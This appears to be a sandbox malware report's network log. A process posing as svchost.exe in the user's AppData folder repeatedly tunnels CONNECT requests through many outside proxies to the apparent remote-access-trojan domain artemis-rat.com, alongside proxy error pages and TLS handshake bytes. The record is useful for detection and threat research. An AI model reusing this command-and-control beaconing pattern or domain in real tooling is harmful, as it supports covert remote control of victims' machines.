                                                                                    Mar 9, 2024 13:14:31.138667107 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2596192.168.2.557316104.248.158.784722543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.994642973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.333204031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2597192.168.2.558440146.190.85.79312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.998842955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.480302095 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                    Server: squid/4.6
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3773
                                                                                    X-Squid-Error: ERR_DNS_FAIL 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2019 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2598192.168.2.55854354.248.238.1108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.006778955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.273166895 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:31.305476904 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 a5 11 ad c7 67 7c 84 b5 c7 be a3 cd 79 e8 0d 5b 85 a0 2d 8b cf f0 4e 28 67 07 c5 72 2f 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: lheRg|y[-N(gr/*,+0/$#('=<5/artemis-rat.com#N i}#1biQA"pcH!#6SV82MG]pp
                                                                                    Mar 9, 2024 13:14:31.605187893 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 f0 86 01 7b 56 2c a8 7e 18 c6 42 2f 14 6e 7a 82 0f ce 88 b1 8b 0a fe 04 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9{V,~B/nzDOWNGRD0000*H010Uartemis-rat.com0240309120120Z260309120120Z010Uartemis-rat.com0"0*H0LU,m-YLa
                                                                                    Mar 9, 2024 13:14:31.608006954 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 63 a7 32 49 cb 37 f1 77 96 ab ed a6 ea d5 cd 32 a3 68 2b 1d 6e a4 bc 02 83 1c 96 f5 20 e1 98 71 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 00 d3 df 54 2f df 6e 0f 8a 13 ea 51 6c e4 72 cf 3f 55 e6 9f 25
                                                                                    Data Ascii: %! c2I7w2h+n q(T/nQlr?U%- v
                                                                                    Mar 9, 2024 13:14:31.872462988 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 b5 f2 4b 0d d3 90 bb e5 45 35 4d 0c 54 d4 63 bf 99 cb 67 70 5d 8a 54 b4 19 2e 42 d7 99 b6 af 63 07 8e ad 1a 34 80 8b d5
                                                                                    Data Ascii: (KE5MTcgp]T.Bc4


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2599192.168.2.55879445.144.30.20544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.013448000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2600192.168.2.55879645.144.30.20544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.015017986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2601192.168.2.558514121.164.200.18108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.016129971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2602192.168.2.55879845.144.30.20544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.016482115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2603192.168.2.55880245.144.30.20544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.018384933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2604192.168.2.55851151.210.223.9300043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.019401073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2605192.168.2.55880731.7.65.1844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.021677017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2606192.168.2.55880831.7.65.1844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.023174047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2607192.168.2.558666104.23.126.88043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.026797056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.180864096 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2608192.168.2.558671104.17.37.2358043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.027087927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.181113958 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2609192.168.2.55880931.7.65.1844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.027225971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2610192.168.2.55881031.7.65.1844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.028561115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2611192.168.2.55850247.96.145.14888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.044887066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.382698059 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2612192.168.2.55855351.15.247.931637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.050332069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2613192.168.2.557606139.162.181.1775794243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.050523043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.802095890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2614192.168.2.558705104.16.109.1438043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.050776005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.206605911 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2615192.168.2.55765054.36.122.163971343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.050786018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.802093983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2616192.168.2.557531149.202.91.2198043312C:\Users\user\AppData\Roaming\svchost.exe
